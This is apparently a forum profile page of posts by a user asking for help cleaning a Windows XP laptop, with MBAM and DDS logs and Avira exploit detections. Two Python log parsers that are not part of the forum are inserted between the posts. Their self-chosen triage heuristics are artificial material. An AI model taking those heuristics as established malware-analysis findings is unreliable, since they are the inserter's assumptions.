Solaris_Wave
Honorary Members
Posts: 23

Everything posted by Solaris_Wave

  1. One more thing, is it recommended to rename ComboFix to something else entirely, to prevent any malware blocking it from doing its work?
  2. Hi Chris,

     Sorry for the delay. I had some other non-PC related issues to take care of.

     Also, I ran a virus scan with Avira before carrying out the tasks you asked me to do. It was only a quick system scan but still took over an hour. It reported five virus detections (although the event log only shows three). I couldn't find much info on them and the malware all had uninteresting and unrecognised names. When I ran a scan a few days beforehand it didn't find a thing, so I was surprised it found that many. I had the following reported:

     The file 'C:\Documents and Settings\UBA\Local Settings\Temp\Main.class' contained a virus or unwanted program 'EXP/2011-3544.EE' [exploit]
     The file 'C:\Documents and Settings\UBA\Application Data\Sun\Java\Deployment\cache\6.0\31\2720a2df-2b19f17d' contained a virus or unwanted program 'EXP/CVE-2012-0507' [exploit]
     The file 'C:\Documents and Settings\UBA\My Documents\v2.txt' contained a virus or unwanted program 'EXP/CVE-2010-1885' [exploit]

     All files were quarantined. The last file, v2.txt, was what I had copied and pasted into Notepad. It was the long string of characters that was part of the address in the download request from de.exoticbeijing (mentioned in my second post). I thought it was harmless because I saved it as a text file but Avira really didn't like it, so I guess I made a mistake. That was also what alerted Avira when I had posted that script here, as part of my message full of symptoms. Hopefully I haven't accidentally posted some nasty script in this thread that can run (I don't know how easy it is for malware to do its business)! I don't think these detections are related to my initial problems but I could be wrong, seeing as they are Java related. I did another quick scan and no more detections were found. I haven't done any recent full scans though, as that takes at least five hours to do when my external drive is connected. It's only 50% full as well. I will do another full scan soon though.

     I reset my router and flushed the DNS cache. The IP/DNS settings were already set to be obtained automatically but I OK'd and rebooted, just to say that I had done it. I haven't seen any changes but to be honest I don't know what I am looking for. There are still multiple connections according to netstat but they may be related to Avira's WebGuard. One of Online Armor's System Tray programs shows active connections. I keep seeing three System/TCP connections running and then AVWEBGRD.EXE/TCP connections. The latter keep appearing and disappearing and there always seem to be several of them connecting. They do this regardless of whether I am using the internet or not.

     I did another MBAM scan and those two detections will keep coming back unless I set them to be ignored. I haven't tried letting MBAM fix the 'problems' because I believe I know what they are related to. It is strange though that my Windows 7 netbook does not cause MBAM to display these alerts, as I have Windows Updates set to manual and my IE homepage locked in the same fashion as this Win XP laptop.

     I will try ComboFix next as that is the only thing I have not done yet. Please could you tell me if it is okay to keep my external hard disk connected when I run ComboFix?

     Regards, Paul
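The Avira report lines quoted in the post above carry more information than the names suggest: the `EXP/` signature embeds a CVE identifier (sometimes without the `CVE-` prefix, as in `EXP/2011-3544.EE`), and the path tells you how the file most likely arrived. The parser below is an added example, not code from the post or from Avira or Malwarebytes; it takes the file-detection lines from this post plus the WebGuard URL-detection line from a later post (constructed sample, embedded inline), normalises the CVE IDs and classifies each file by where it was found. The location labels and the list of "usual drop zones" are my own assumptions about Java drive-by artefacts on XP, not something the post states.

```python
import re

# Constructed sample: the three file detections quoted above and the WebGuard
# URL detection from a later post, one report line each, in Avira's wording.
SAMPLE_AVIRA = r"""
The file 'C:\Documents and Settings\UBA\Local Settings\Temp\Main.class' contained a virus or unwanted program 'EXP/2011-3544.EE' [exploit]
The file 'C:\Documents and Settings\UBA\Application Data\Sun\Java\Deployment\cache\6.0\31\2720a2df-2b19f17d' contained a virus or unwanted program 'EXP/CVE-2012-0507' [exploit]
The file 'C:\Documents and Settings\UBA\My Documents\v2.txt' contained a virus or unwanted program 'EXP/CVE-2010-1885' [exploit]
When accessing data from the URL, "http://forums.malwarebytes.org/index.php?app=forums&module=ajax&section=topics&do=reply&t=108096&f=7&pid=541212" a virus or unwanted program 'HTML/rug.A.3' [virus] was found. Action taken: Blocked file
""".strip()

FILE_RE = re.compile(
    r"^The file '(?P<path>.+?)' contained a virus or unwanted program '(?P<sig>[^']+)' \[(?P<cat>\w+)\]")
URL_RE = re.compile(
    r"^When accessing data from the URL, \"(?P<url>[^\"]+)\" a virus or unwanted program "
    r"'(?P<sig>[^']+)' \[(?P<cat>\w+)\] was found\.(?: Action taken: (?P<action>.+))?$")
# Avira EXP/ names carry the CVE year and number, with or without the "CVE-" prefix.
CVE_RE = re.compile(r"(?:CVE-)?(\d{4})-(\d{4,})", re.IGNORECASE)

# Assumed drop zones for browser-delivered Java exploits on an XP profile (my labels).
LOCATION_HINTS = [
    (r"\\sun\\java\\deployment\\cache\\", "Java deployment cache (JAR/class fetched by the browser plugin)"),
    (r"\\local settings\\temp\\", "user temp directory (dropped or extracted at runtime)"),
    (r"\\my documents\\", "user documents (saved by the user)"),
]


def cve_from_signature(sig):
    """Return a normalised CVE-YYYY-NNNN for EXP/ signatures, else None."""
    if not sig.upper().startswith("EXP/"):
        return None
    m = CVE_RE.search(sig[4:])
    return f"CVE-{m.group(1)}-{m.group(2)}" if m else None


def classify_location(path):
    low = path.lower()
    for pattern, label in LOCATION_HINTS:
        if re.search(pattern, low):
            return label
    return "other"


def parse_avira(text):
    """Turn Avira report lines into dicts; unknown line shapes are skipped."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        m = FILE_RE.match(line)
        if m:
            events.append({"kind": "file", "target": m["path"], "signature": m["sig"],
                           "category": m["cat"], "cve": cve_from_signature(m["sig"]),
                           "location": classify_location(m["path"])})
            continue
        m = URL_RE.match(line)
        if m:
            events.append({"kind": "url", "target": m["url"], "signature": m["sig"],
                           "category": m["cat"], "cve": cve_from_signature(m["sig"]),
                           "action": m["action"]})
    return events


def cves(events):
    """Sorted, de-duplicated CVE identifiers across all events."""
    return sorted({e["cve"] for e in events if e["cve"]})


if __name__ == "__main__":
    for e in parse_avira(SAMPLE_AVIRA):
        print(e["kind"], e["cve"], e.get("location", e.get("action")), e["target"])
    print("CVEs referenced:", ", ".join(cves(parse_avira(SAMPLE_AVIRA))))
```

The CVE list is the useful output: it tells you which exploits the scanner recognised rather than which files it quarantined. The Java deployment cache hit is the one to chase, since every cached entry sits next to a `.idx` file that records the URL it was downloaded from.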
  3. Hi Chris,

     I've reposted my second post again, with a larger font. The formatting seems to have gone a bit strange somewhere though, because it insists on either being really small text or really large where everything is messed up. Even now I have set it to a higher font size than what makes sense (it should look huge if I used this size normally). Nevertheless, hopefully it will be easier to read for you! In the meantime, I will carry out your recent instructions. The post is as follows:

     I've copied and pasted the two logs you have requested, with some additional information either relating to the logs or from the behaviour of my PC. I have separated each log and my own input with lines so you are not looking at a solid wall of text. Unfortunately, it is a lengthy post because I have tried to be as detailed as possible. I have been writing down (or copying into Notepad) anything I haven't liked the look of.

     First up is the MBAM log:

     _________________________________________________________________________________________________________________________________________

     Malwarebytes Anti-Malware (PRO) 1.61.0.1400
     www.malwarebytes.org

     Database version: v2012.04.10.08

     Windows XP Service Pack 3 x86 NTFS
     Internet Explorer 8.0.6001.18702
     UBA :: TSP-A40 [administrator]

     Protection: Enabled

     10/04/2012 19:57:13
     mbam-log-2012-04-10 (20-05-45).txt

     Scan type: Quick scan
     Scan options enabled: Memory | Startup | Registry | File System | Heuristics/Extra | Heuristics/Shuriken | PUP | PUM
     Scan options disabled: P2P
     Objects scanned: 176319
     Time elapsed: 7 minute(s), 47 second(s)

     Memory Processes Detected: 0
     (No malicious items detected)

     Memory Modules Detected: 0
     (No malicious items detected)

     Registry Keys Detected: 0
     (No malicious items detected)

     Registry Values Detected: 0
     (No malicious items detected)

     Registry Data Items Detected: 2
     HKCU\SOFTWARE\Policies\Microsoft\Internet Explorer\control panel|Homepage (PUM.Hijack.HomePageControl) -> Bad: (1) Good: (0) -> No action taken.
     HKLM\SOFTWARE\Microsoft\Security Center|UpdatesDisableNotify (PUM.Disabled.SecurityCenter) -> Bad: (1) Good: (0) -> No action taken.

     Folders Detected: 0
     (No malicious items detected)

     Files Detected: 0
     (No malicious items detected)

     (end)

     _________________________________________________________________________________________________________________________________________

     There are two things I would like to comment on here. Firstly, you will see that I have the Pro version of MBAM. I preferred to post on here as opposed to e-mailing support because I really didn't like the idea of accessing my e-mail account on this PC. I have also avoided logging into any sites that require passwords on this particular PC, with the exception of this forum, as I don't trust it.

     Next up, regarding the MBAM log, are the two reported warnings. I normally have those set to be ignored so they don't appear every time I scan. I removed those for the time being so that they would appear and just skipped fixing them. I'm not sure which software or setting affects these two warnings but I have deliberately disabled notification of Windows Updates (if that is indeed one of the warnings) as I prefer to search for updates manually. With the exception of certain software such as my anti-virus, firewall and MBAM, I don't like things running in the background, hogging my internet connection or doing things to my PC when I am trying to use it for other tasks. The second warning about the Homepage hijack may be related to SpywareBlaster. I have that set to block changes to my Internet Explorer homepage. I do have control over changing it myself however. Nevertheless, if you feel that these warnings in MBAM need fixing or my settings need changing, then please feel free to tell me.

     Next up is the DDS.txt log. I saw the warning to disable any script blocking tools but I wasn't sure what they might be. Therefore I didn't change anything and DDS ran fine anyway. Was I supposed to disable any anti-malware software at all (Avira, Online Armor, MBAM or SpywareBlaster)?

     _________________________________________________________________________________________________________________________________________

     .
     DDS (Ver_2011-08-26.01) - NTFSx86
     Internet Explorer: 8.0.6001.18702
     Run by UBA at 20:07:32 on 2012-04-10
     Microsoft Windows XP Home Edition 5.1.2600.3.1252.44.1033.18.1007.485 [GMT 1:00]
     .
     AV: AntiVir Desktop *Enabled/Updated* {C19476D9-52BC-4E93-8AF3-CCF59F7AE8FE}
     FW: Online Armor Firewall *Enabled*
     .
     ============== Running Processes ===============
     .
     C:\WINDOWS\system32\svchost -k DcomLaunch
     svchost.exe
     C:\WINDOWS\System32\svchost.exe -k netsvcs
     svchost.exe
     C:\WINDOWS\Explorer.EXE
     svchost.exe
     C:\Program Files\Tall Emu\Online Armor\OAcat.exe
     C:\Program Files\Tall Emu\Online Armor\oasrv.exe
     C:\WINDOWS\system32\spoolsv.exe
     C:\Program Files\Avira\AntiVir Desktop\sched.exe
     svchost.exe
     C:\Program Files\Avira\AntiVir Desktop\avguard.exe
     C:\Program Files\TOSHIBA\ConfigFree\CFSvcs.exe
     C:\WINDOWS\System32\svchost.exe -k HTTPFilter
     C:\Program Files\Avira\AntiVir Desktop\avshadow.exe
     C:\Program Files\Malwarebytes' Anti-Malware\mbamservice.exe
     C:\Program Files\Analog Devices\SoundMAX\SMAgent.exe
     C:\Program Files\Avira\AntiVir Desktop\avmailc.exe
     C:\Program Files\Avira\AntiVir Desktop\AVWEBGRD.EXE
     C:\WINDOWS\System32\hkcmd.exe
     C:\WINDOWS\System32\00THotkey.exe
     C:\WINDOWS\LTSMMSG.exe
     C:\Program Files\Apoint2K\Apoint.exe
     C:\Program Files\TOSHIBA\TouchED\TouchED.Exe
     C:\Program Files\TOSHIBA\PadTouch\PadExe.exe
     C:\WINDOWS\system32\TFNF5.exe
     C:\WINDOWS\system32\TPSMain.exe
     C:\Program Files\TOSHIBA\TOSHIBA Controls\TFncKy.exe
     C:\Program Files\Tall Emu\Online Armor\oaui.exe
     C:\WINDOWS\system32\TPSBattM.exe
     C:\Program Files\Avira\AntiVir Desktop\avgnt.exe
     C:\Program Files\Malwarebytes' Anti-Malware\mbamgui.exe
     C:\Program Files\Windows Media Player\WMPNSCFG.exe
     C:\Program Files\Apoint2K\Apntex.exe
     C:\Program Files\Tall Emu\Online Armor\OAhlp.exe
     C:\Program Files\GetRight\GetRight.exe
     C:\Program Files\Logitech\SetPoint\SetPoint.exe
     C:\Program Files\Common Files\Logishrd\KHAL2\KHALMNPR.EXE
     .
     ============== Pseudo HJT Report ===============
     .
     uStart Page = hxxp://home.live.com/
     BHO: Adobe PDF Link Helper: {18df081c-e8ad-4283-a596-fa578c2ebdc3} - c:\program files\common files\adobe\acrobat\activex\AcroIEHelperShim.dll
     BHO: IE to GetRight Helper: {31ff080d-12a3-439a-a2ef-4ba95a3148e8} - c:\program files\getright\xx2gr.dll
     BHO: Java™ Plug-In 2 SSV Helper: {dbc80044-a445-435b-bc74-9c25c1c588a9} - c:\program files\java\jre6\bin\jp2ssv.dll
     EB: {32683183-48a0-441b-a342-7c2a440a9478} - No File
     uRun: [WMPNSCFG] c:\program files\windows media player\WMPNSCFG.exe
     uRunOnce: [shockwave Updater] c:\windows\system32\adobe\shockwave 11\SwHelper_1151601.exe -Update -1151601 -"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" -"http://www.adobe.com/shockwave/welcome/"
     mRun: [igfxTray] c:\windows\system32\igfxtray.exe
     mRun: [HotKeysCmds] c:\windows\system32\hkcmd.exe
     mRun: [00THotkey] c:\windows\system32\00THotkey.exe
     mRun: [000StTHK] 000StTHK.exe
     mRun: [LTSMMSG] LTSMMSG.exe
     mRun: [Apoint] c:\program files\apoint2k\Apoint.exe
     mRun: [TouchED] c:\program files\toshiba\touched\TouchED.Exe
     mRun: [PadTouch] "c:\program files\toshiba\padtouch\PadExe.exe
     mRun: [TFNF5] TFNF5.exe
     mRun: [TPSMain] TPSMain.exe
     mRun: [TFncKy] TFncKy.exe
     mRun: [@OnlineArmor GUI] "c:\program files\tall emu\online armor\oaui.exe"
     mRun: [Kernel and Hardware Abstraction Layer] KHALMNPR.EXE
     mRun: [Adobe Reader Speed Launcher] "c:\program files\adobe\reader 9.0\reader\Reader_sl.exe"
     mRun: [Adobe ARM] "c:\program files\common files\adobe\arm\1.0\AdobeARM.exe"
     mRun: [sunJavaUpdateSched] "c:\program files\common files\java\java update\jusched.exe"
     mRun: [avgnt] "c:\program files\avira\antivir desktop\avgnt.exe" /min
     mRun: [Malwarebytes' Anti-Malware] "c:\program files\malwarebytes' anti-malware\mbamgui.exe" /starttray
     StartupFolder: c:\docume~1\alluse~1\startm~1\programs\startup\getright.lnk - c:\program files\getright\GetRight.exe
     StartupFolder: c:\docume~1\alluse~1\startm~1\programs\startup\logite~1.lnk - c:\program files\logitech\setpoint\SetPoint.exe
     IE: Download with GetRight - c:\program files\getright\GRdownload.htm
     IE: Open with GetRight Browser - c:\program files\getright\GRbrowse.htm
     IE: {e2e2dd38-d088-4134-82b7-f2ba38496583} - %windir%\Network Diagnostic\xpnetdiag.exe
     IE: {FB5F1910-F110-11d2-BB9E-00C04F795683} - c:\program files\messenger\msmsgs.exe
     LSP: c:\program files\avira\antivir desktop\avsda.dll
     DPF: {166B1BCA-3F9C-11CF-8075-444553540000} - hxxp://download.macromedia.com/pub/shockwave/cabs/director/sw.cab
     DPF: {233C1507-6A77-46A4-9443-F871F945D258} - hxxp://download.macromedia.com/pub/shockwave/cabs/director/sw.cab
     DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} - hxxp://www.update.microsoft.com/windowsupdate/v6/V5Controls/en/x86/client/wuweb_site.cab?1264487526468
     DPF: {7530BFB8-7293-4D34-9923-61A11451AFC5} - hxxp://download.eset.com/special/eos/OnlineScanner.cab
     DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_20-windows-i586.cab
     DPF: {CAFEEFAC-0016-0000-0020-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_20-windows-i586.cab
     DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_20-windows-i586.cab
     DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} - hxxp://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
     TCP: DhcpNameServer = 192.168.1.254
     TCP: Interfaces\{1C7A2F47-0733-4991-854B-E312D1FE6FE7} : DhcpNameServer = 192.168.1.254
     Notify: igfxcui - igfxsrvc.dll
     Notify: LBTWlgn - c:\program files\common files\logishrd\bluetooth\LBTWlgn.dll
     SSODL: WPDShServiceObj - {AAA288BA-9A4C-45B0-95D7-94D524869DB5} - c:\windows\system32\WPDShServiceObj.dll
     SEH: OA Shell Helper: {4f07da45-8170-4859-9b5f-037ef2970034} - c:\progra~1\tallem~1\online~1\oaevent.dll
     Hosts: 127.0.0.1 www.spywareinfo.com
     .
     ================= FIREFOX ===================
     .
     FF - ProfilePath - c:\documents and settings\uba\application data\mozilla\firefox\profiles\05slwm2p.default\
     FF - prefs.js: network.proxy.type - 0
     FF - plugin: c:\program files\divx\divx plus web player\npdivx32.dll
     FF - plugin: c:\program files\java\jre6\bin\new_plugin\npdeployJava1.dll
     FF - plugin: c:\windows\system32\macromed\flash\NPSWF32_11_2_202_228.dll
     .
     ============= SERVICES / DRIVERS ===============
     .
     R1 avgio;avgio;c:\program files\avira\antivir desktop\avgio.sys [2010-12-15 11608]
     R1 OADevice;OADriver;c:\windows\system32\drivers\OADriver.sys [2009-10-15 200784]
     R1 OAmon;OAmon;c:\windows\system32\drivers\OAmon.sys [2009-10-15 24656]
     R1 OAnet;OAnet;c:\windows\system32\drivers\OAnet.sys [2009-10-15 29776]
     R2 AntiVirMailService;Avira AntiVir MailGuard;c:\program files\avira\antivir desktop\avmailc.exe [2010-12-15 340136]
     R2 AntiVirSchedulerService;Avira AntiVir Scheduler;c:\program files\avira\antivir desktop\sched.exe [2010-12-15 136360]
     R2 AntiVirService;Avira AntiVir Guard;c:\program files\avira\antivir desktop\avguard.exe [2010-12-15 269480]
     R2 AntiVirWebService;Avira AntiVir WebGuard;c:\program files\avira\antivir desktop\avwebgrd.exe [2010-12-15 428200]
     R2 avgntflt;avgntflt;c:\windows\system32\drivers\avgntflt.sys [2010-12-15 66616]
     R2 MBAMService;MBAMService;c:\program files\malwarebytes' anti-malware\mbamservice.exe [2010-10-14 654408]
     R2 OAcat;Online Armor Helper Service;c:\program files\tall emu\online armor\oacat.exe [2009-10-15 1244360]
     R2 SvcOnlineArmor;Online Armor;c:\program files\tall emu\online armor\oasrv.exe [2009-10-15 3184328]
     R3 MBAMProtector;MBAMProtector;c:\windows\system32\drivers\mbam.sys [2010-10-14 22344]
     S3 AdobeFlashPlayerUpdateSvc;Adobe Flash Player Update Service;c:\windows\system32\macromed\flash\FlashPlayerUpdateService.exe [2012-4-1 253600]
     .
     =============== Created Last 30 ================
     .
     2012-04-10 14:59:12	711240	----a-w-	c:\windows\isRS-000.tmp
     2012-04-04 18:56:08	--------	d-----w-	c:\documents and settings\uba\local settings\application data\Mozilla
     2012-04-04 10:29:42	--------	d-----w-	c:\program files\Microsoft Windows 7 Upgrade Advisor
     2012-04-02 22:47:58	--------	d-----w-	c:\program files\HitmanPro
     2012-04-02 22:47:51	--------	d-----w-	c:\documents and settings\all users\application data\HitmanPro
     2012-04-02 18:21:06	--------	d-----w-	c:\documents and settings\uba\local settings\application data\NPE
     2012-04-02 18:21:06	--------	d-----w-	c:\documents and settings\all users\application data\Norton
     2012-04-01 16:11:55	70304	----a-w-	c:\windows\system32\FlashPlayerCPLApp.cpl
     2012-04-01 16:11:55	418464	----a-w-	c:\windows\system32\FlashPlayerApp.exe
     .
     ==================== Find3M ====================
     .
     2012-04-04 14:56:40	22344	----a-w-	c:\windows\system32\drivers\mbam.sys
     2012-03-31 10:13:21	66616	----a-w-	c:\windows\system32\drivers\avgntflt.sys
     .
     ============= FINISH: 20:10:51.20 ===============

     _________________________________________________________________________________________________________________________________________

     Since running DDS in my first post, I have installed Firefox (which I normally use on another PC), installed Windows 7 Upgrade Advisor (just to see what kind of result it would give me, even though I wasn't planning to install W7 on this PC, and the Advisor always crashes), and also installed Hitman Pro, just to test it. Additionally, I also switched on my external HDD as the bulk of my data is on there. I don't know if the latter makes any difference to DDS' results though. I have not installed any Windows Updates for XP since last year as I didn't want to alter the OS too much if the PC is infected. Likewise, I haven't updated Java for the same reasons. Please could you view my first post for details on why those are out of date, if that is ok.

     I never used Firefox on this PC in the past and only used Internet Explorer. IE runs terribly slowly and temporarily freezes frequently when visiting sites. That may be down to poor hardware specs though, as Firefox does likewise (although vastly less often). In fact, the PC behaves slowly and freezes sometimes even when no browsers are being used. MBAM takes a long time to update and spends most of its time saying it is connecting to the server (in contrast, my netbook PC connects to the MBAM servers instantly but is more modern (if not all that powerful), runs Windows 7 and has different anti-virus and firewall software). This PC never shuts down properly either and I have to press the power switch to complete the Shutting Down process. This occurred the same day as I started seeing the strange download requests.

     I thought the download prompts were exclusive to Internet Explorer (I thought it was an IE window appearing) but installing Firefox told me otherwise. Those prompts appear in FF also. They all seem to be related to sites that use Java. As well as the sites mentioned in my first post, I recently tried Runescape.com and the British Telecom speed test site. Whenever I visit sites such as these, I get the window asking me to download something, with the publisher always being listed as Microsoft Corporation. This is highly suspect seeing as those sites won't have anything to do with MS. Also, there is always a problem with the signature verification, saying that it has expired or is invalid. I always cancel the request to download. The site's application will then display and run as normal. If not, then another prompt appears with the publisher being far more likely (e.g. Jagex for Runescape). The digital signature is also verified.

     Before I recently removed it, I visited an old bookmark (while using IE) that I had added a few years ago. Not remembering what it was, I visited it. I know for sure it wasn't a bad site (pirated software, pornography, etc.). I got redirected to one of those old screens saying "Congratulations, you're our 1000th visitor of the day. Click here to go claim your prize." I haven't seen those damn things in ages. Annoyingly I couldn't close it and it wasn't a popup. I couldn't even close IE normally and every time I tried to close it with Task Manager, the End Program window kept disappearing every time I tried to get my mouse pointer near it.

     Another site had been replaced with a screen full of banner ads. This one was more alarming as Avira's WebGuard said it blocked TR/Ramnit.E. At the same time, I saw a prompt appear saying the following:

     Do you want to allow this website to open a program on your computer?
     From: de.exoticbeijing.com
     Program: Microsoft Help and Support Center
     Address: (This was a very long script. I have copied and pasted it into Notepad but haven't displayed it here just in case that caused the virus warning.)

     I cancelled it and haven't seen anything like that since. I don't know if that was just something lying in wait at the now dodgy website or is related to the problems I have been seeing. Seeing Microsoft appear once again made me wonder. Also, there was the fact that Avira listed Ramnit, and one site I noted visiting, shortly before my accident last year when I last used this PC, asked if I wanted to download something called cpak.Crimepack (with the same Java related prompt). I once read about that and Ramnit got mentioned at the same time.

     I have since removed lots of bookmarks, if they are not ones that I remember or recognise. I'm sure I added them myself, as opposed to them being rogue, but they were more than likely added years ago. I had a habit of adding bookmarks to look at later and then not deleting them.

     Once again, sorry for the lengthy post. As always, I wanted to give as much detail as possible.

     Kind regards, Paul
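A DDS log like the one in the post above is a fixed line-oriented format, so the parts a helper actually reads (Run keys, BHOs, DPF-installed ActiveX controls, hosts overrides, services and drivers) can be pulled out mechanically. The parser below is an added example, not code from the post, from DDS or from Malwarebytes; it works on a short constructed sample made of lines copied from the log above (with DDS's `hxxp` defanging left in place). It uses the log's own conventions: service lines are `R`/`S` (running/stopped) plus the Windows start type digit, then `name;display;path [date size]`; `u`/`m` prefixes on Run entries mean HKCU/HKLM. The "findings" it reports (Java version registered through DPF, hosts-file overrides, stopped services) are my own choice of things to surface, not anything the post or DDS flags.

```python
import re

# Constructed sample: lines lifted from the DDS.txt in the post above, one entry
# per line as DDS writes them. "hxxp" is DDS's own defanging of "http".
SAMPLE_DDS = r"""DDS (Ver_2011-08-26.01) - NTFSx86
Microsoft Windows XP Home Edition 5.1.2600.3.1252.44.1033.18.1007.485 [GMT 1:00]
.
============== Pseudo HJT Report ===============
.
uStart Page = hxxp://home.live.com/
BHO: Java Plug-In 2 SSV Helper: {dbc80044-a445-435b-bc74-9c25c1c588a9} - c:\program files\java\jre6\bin\jp2ssv.dll
mRun: [avgnt] "c:\program files\avira\antivir desktop\avgnt.exe" /min
mRun: [sunJavaUpdateSched] "c:\program files\common files\java\java update\jusched.exe"
DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_20-windows-i586.cab
DPF: {7530BFB8-7293-4D34-9923-61A11451AFC5} - hxxp://download.eset.com/special/eos/OnlineScanner.cab
Hosts: 127.0.0.1 www.spywareinfo.com
.
============= SERVICES / DRIVERS ===============
.
R1 OADevice;OADriver;c:\windows\system32\drivers\OADriver.sys [2009-10-15 200784]
R2 AntiVirService;Avira AntiVir Guard;c:\program files\avira\antivir desktop\avguard.exe [2010-12-15 269480]
S3 AdobeFlashPlayerUpdateSvc;Adobe Flash Player Update Service;c:\windows\system32\macromed\flash\FlashPlayerUpdateService.exe [2012-4-1 253600]
.
============= FINISH: 20:10:51.20 ===============
"""

SECTION_RE = re.compile(r"^=+\s*(.+?)\s*=+$")
# R/S = running/stopped, digit = Windows start type (1 system, 2 auto, 3 manual)
SERVICE_RE = re.compile(r"^([RS][0-4])\s+([^;]+);([^;]*);(.+?)\s+\[(\S+)\s+(\d+)\]$")
DPF_RE = re.compile(r"^DPF:\s+(\{[0-9A-Fa-f-]+\})\s+-\s+(\S+)$")
BHO_RE = re.compile(r"^BHO:\s+(.+?):\s+(\{[0-9A-Fa-f-]+\})\s+-\s+(.+)$")
RUN_RE = re.compile(r"^([um])(Run(?:Once)?):\s+\[([^\]]+)\]\s+(.+)$")
HOSTS_RE = re.compile(r"^Hosts:\s+(\S+)\s+(\S+)$")
JAVA_CAB_RE = re.compile(r"jinstall-(\d+)_(\d+)_(\d+)_(\d+)-")


def parse_dds(text):
    """Split a DDS log into its sections and parse the entry types we care about."""
    report = {"header": [], "sections": [], "bho": [], "run": [], "dpf": [],
              "hosts": [], "services": []}
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line == ".":          # DDS pads sections with lone dots
            continue
        m = SECTION_RE.match(line)
        if m:
            section = m.group(1)
            report["sections"].append(section)
            continue
        if section is None:                  # tool/OS banner before the first section
            report["header"].append(line)
            continue
        m = SERVICE_RE.match(line)
        if m:
            state, name, display, path, date, size = m.groups()
            report["services"].append({"running": state[0] == "R",
                                       "start_type": int(state[1]), "name": name,
                                       "display": display, "path": path,
                                       "date": date, "size": int(size)})
            continue
        m = DPF_RE.match(line)
        if m:
            report["dpf"].append({"clsid": m.group(1), "url": m.group(2)})
            continue
        m = BHO_RE.match(line)
        if m:
            report["bho"].append({"name": m.group(1), "clsid": m.group(2), "path": m.group(3)})
            continue
        m = RUN_RE.match(line)
        if m:
            report["run"].append({"scope": "HKCU" if m.group(1) == "u" else "HKLM",
                                  "key": m.group(2), "name": m.group(3), "command": m.group(4)})
            continue
        m = HOSTS_RE.match(line)
        if m:
            report["hosts"].append({"ip": m.group(1), "host": m.group(2)})
    return report


def java_versions(report):
    """JRE versions whose installer CAB is registered as a DPF ActiveX control."""
    versions = []
    for d in report["dpf"]:
        m = JAVA_CAB_RE.search(d["url"])
        if m:
            v = f"{m.group(1)}.{m.group(2)}.{m.group(3)}_{m.group(4)}"
            if v not in versions:
                versions.append(v)
    return versions


def findings(report):
    """Things a reviewer would look at first; the selection is mine, not DDS's."""
    out = [f"Java plugin {v} registered via DPF (compare with the current JRE release)"
           for v in java_versions(report)]
    out += [f"hosts file maps {h['host']} to {h['ip']}" for h in report["hosts"]]
    out += [f"service {s['name']} installed but not running: {s['path']}"
            for s in report["services"] if not s["running"]]
    return out


if __name__ == "__main__":
    for f in findings(parse_dds(SAMPLE_DDS)):
        print(f)
```

Run on the full log, the `run`, `bho` and `dpf` lists are what you diff against a known-good machine; the DPF entries in particular record which installer CABs Internet Explorer was allowed to pull, which is how the `jinstall-1_6_0_20` version string in the log above becomes a concrete "Java 1.6.0_20" data point.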
  4. Just to add to my last post, this was what Avira shows in its logs when I tried to post in this thread:

     When accessing data from the URL, "http://forums.malwarebytes.org/index.php?app=forums&module=ajax&section=topics&do=reply&t=108096&f=7&pid=541212" a virus or unwanted program 'HTML/rug.A.3' [virus] was found. Action taken: Blocked file
  5. Hi Chris,

     That was a very fast response. I don't know if you had a chance to read my second post because I uploaded it shortly before you posted a reply. Also, as soon as I clicked on Post, Avira came up with a virus warning and I denied access. I then saw the site freezing as it was saying it was saving the post (and then got stuck on it). I opened a new window and saw that the post had been uploaded fine. I don't know what the virus warning was though, unless it was to do with that script that I copied and pasted from one of those suspect download prompts. I was about to remove that part of my post.

     Also, I don't know why the font for my second post is so small! It did that by default. Would you like me to repost it, with larger text so you don't need a magnifying glass?

     To answer your question, yes I am connected through a router. I have it wired only, with wireless disabled. No other PC is connected at this time as I didn't want to risk infection. I am keeping the two PCs separate and will reset the router before connecting the other PC. The only other thing connected is my Xbox 360 but that hasn't been used for some time due to my injuries (paralysis).

     Seeing as I just posted an MBAM log before you replied, would you like me to post another before trying ComboFix?

     Regards, Paul

     Edited by screen317 to merge last post with this one
  6. Hello Chris, Thank you for your assistance! I've copied and pasted the two logs you have requested, with some additional information either relating to the logs or from the behaviour of my PC. I have separated each log and my own input with lines so you are not looking at a solid wall of text. Unfortunately, it is a lengthy post because I have tried to be as detailed as possible. I have been writing everything down (or copying into Notepad) anything I haven't liked the look of. First up is the MBAM log: _________________________________________________________________________________________________________________________________________ Malwarebytes Anti-Malware (PRO) 1.61.0.1400 www.malwarebytes.org Database version: v2012.04.10.08 Windows XP Service Pack 3 x86 NTFS Internet Explorer 8.0.6001.18702 UBA :: TSP-A40 [administrator] Protection: Enabled 10/04/2012 19:57:13 mbam-log-2012-04-10 (20-05-45).txt Scan type: Quick scan Scan options enabled: Memory | Startup | Registry | File System | Heuristics/Extra | Heuristics/Shuriken | PUP | PUM Scan options disabled: P2P Objects scanned: 176319 Time elapsed: 7 minute(s), 47 second(s) Memory Processes Detected: 0 (No malicious items detected) Memory Modules Detected: 0 (No malicious items detected) Registry Keys Detected: 0 (No malicious items detected) Registry Values Detected: 0 (No malicious items detected) Registry Data Items Detected: 2 HKCU\SOFTWARE\Policies\Microsoft\Internet Explorer\control panel|Homepage (PUM.Hijack.HomePageControl) -> Bad: (1) Good: (0) -> No action taken. HKLM\SOFTWARE\Microsoft\Security Center|UpdatesDisableNotify (PUM.Disabled.SecurityCenter) -> Bad: (1) Good: (0) -> No action taken. Folders Detected: 0 (No malicious items detected) Files Detected: 0 (No malicious items detected) (end) _________________________________________________________________________________________________________________________________________ There are two things I would like to comment on here. 
